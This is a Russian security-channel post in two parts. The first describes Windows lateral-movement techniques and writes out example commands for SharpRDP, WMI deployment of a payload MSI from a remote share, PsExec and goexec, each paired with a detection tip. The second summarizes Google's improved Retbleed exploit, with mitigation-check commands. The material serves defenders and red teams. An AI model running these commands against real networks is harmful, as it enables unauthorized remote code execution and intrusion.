Горизонтальное перемещение: тени в инфраструктуре

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты.

Тихий проход через Headless RDP 😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:

SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.

WMI с MSI: установка, которая не то, чем кажется 🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:

Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.

PsExec: громкий, но надежный 🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:

PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.

GoExec: современный шпион 👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:

goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.

Как итог 🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.

Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.

Retbleed: Google показала как красть память любого процесса
#google #AMD #Intel #CPU #hardware

Исследователи Google продемонстрировали значительно улучшенный эксплойт уязвимости Retbleed, который позволяет читать память любого процесса на современных CPU AMD и Intel. Скорость кражи данных достигает 13 КБ/с даже из песочницы.

Retbleed - это уязвимость в современных процессорах, обнаруженная в 2022 году исследователями ETH Zürich. Она использует спекулятивное выполнение инструкций - технологию, которая позволяет CPU предсказывать и выполнять команды заранее для повышения производительности.

Что такое спекулятивное выполнение:
Современные процессоры не ждут подтверждения каждой инструкции, а выполняют их "на опережение" основываясь на предсказаниях. Это как читать следующую страницу книги, пока обдумываете предыдущую. Если предсказание оказалось неверным, результат отбрасывается, но следы остаются в кэше процессора.

➡️Механизм атаки:

Шаг 1: Обучение предсказателя
Атакующий "тренирует" систему предсказания переходов процессора, заставляя её ожидать определенные адреса памяти при выполнении return-инструкций.

Шаг 2: Спекулятивное выполнение
Когда процессор встречает return, он спекулятивно выполняет код по предсказанному адресу, даже если этот адрес содержит данные жертвы.

Шаг 3: Извлечение через кэш
Хотя результат спекулятивного выполнения отбрасывается, данные остаются в кэше. Атакующий анализирует время доступа к памяти и восстанавливает украденную информацию.

➡️Улучшения Google:
Оригинальный эксплойт Retbleed работал только в лабораторных условиях. Команда Google (Matteo Rizzo и Andy Nguyen) решила три критические проблемы:

Обход KASLR: Kernel Address Space Layout Randomization рандомизирует расположение кода ядра в памяти. Исследователи использовали микроархитектурные side-channel атаки для определения реальных адресов.

Создание идеальных гаджетов: Через спекулятивное ROP (Return Oriented Programming) они научились создавать оптимальные последовательности инструкций для утечки данных.

➡️Работа в песочнице: Эксплойт функционирует даже в строго ограниченной среде без привилегий, что делает его особенно опасным.

➡️Практические результаты:
- Скорость утечки: ~13 КБ/с с высокой точностью
- Работает из непривилегированного процесса в песочнице
- Позволяет перечислить все запущенные процессы и VM
- Может красть криптографические ключи и другие чувствительные данные
- Работает из виртуальных машин для кражи данных хоста

➡️Интересные факты:
Эксплойт работает против AMD Zen 2 процессоров, которые широко используются в облачных сервисах. Это означает, что один арендатор облака потенциально может читать данные других. Особенно опасно то, что атака работает из виртуальных машин - гость может красть данные хоста, что нарушает основы изоляции в облачных средах.

➡️Защитные меры:
Существующие митигации дорогостоящие и значительно влияют на производительность:

Микрокод процессора: AMD и Intel выпустили обновления микрокода, но они замедляют работу на 10-20%.
Отключение спекулятивного выполнения: Радикальная мера, которая может снизить производительность на 30-50%.
Изоляция процессов: Усиленная изоляция между процессами и виртуальными машинами.

➡️Проверка уязвимости:

# Проверка статуса митигаций Retbleed
cat /sys/devices/system/cpu/vulnerabilities/retbleed

# Проверка версии микрокода
grep microcode /proc/cpuinfo

➡️Настройки ядра:

# Включение всех митигаций (влияет на производительность)
echo "retbleed=auto" >> /etc/default/grub
update-grub

➡️Источники:
Google Bug Hunters
PoC

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK